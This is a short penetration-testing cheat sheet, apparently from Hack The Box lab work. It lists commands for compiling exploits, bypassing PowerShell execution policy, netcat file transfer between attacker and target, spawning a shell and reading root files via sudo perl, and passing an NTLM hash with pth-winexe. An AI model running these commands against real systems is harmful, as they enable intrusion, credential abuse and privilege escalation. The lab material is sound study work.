Miscellaneous Commands

Compiling Exploits

Compile C code: gcc -o exploit exploit.c (add -m32 after 'gcc' to compile 32-bit code on 64-bit Linux)
Cross compiling (Windows target from Linux): i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe
Compile Windows exploit in Linux (64-bit toolchain): i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe
Compile Python script to executable: wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Packet Inspection

Capture HTTP traffic to a pcap: tcpdump -i eth0 -w output.pcap tcp port 80

Powershell bypass

Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

Windows Exploit Suggester

./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt

Finding Auxiliary (Nmap NSE scripts)

ls /usr/share/nmap/scripts/ | grep smb | grep vuln

Netcat

File transfer from attacker to target:
At target (listener): nc -lvp 6969 > blah.txt
At attacker (method 1): nc x.x.x.x 6969 < blah.txt
At attacker (method 2): cat blah.txt | nc x.x.x.x 6969

Perl Exploit

Spawn a shell from Perl: perl -e 'exec "/bin/sh";'
Read a file through sudo perl (prints the first colon-separated field of each line): sudo perl -F: -lane 'print $F[0]' /root/root.txt

Awk

Remove duplicate lines: awk '!seen[$0]++' file

Searchsploit

Mirror an exploit by EDB-ID: searchsploit --overflow --exact --mirror 21234
Search by exact title: searchsploit --overflow --exact Gwolle

Firewall Rule Enable

Firewall rule enable (allow 80/443 from a single host): ufw allow from victimip to any port 80,443 proto tcp

Wordlist Creation

Wordlist creation: cewl -w cewl-forum.txt -e -a http://forum.bart.htb

PASS the HASH

Pass the hash:
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
Alternative tool: crackmapexec
pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

Share folder Windows to Linux (VMware shared folders)

Mount the host share via hgfs: mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other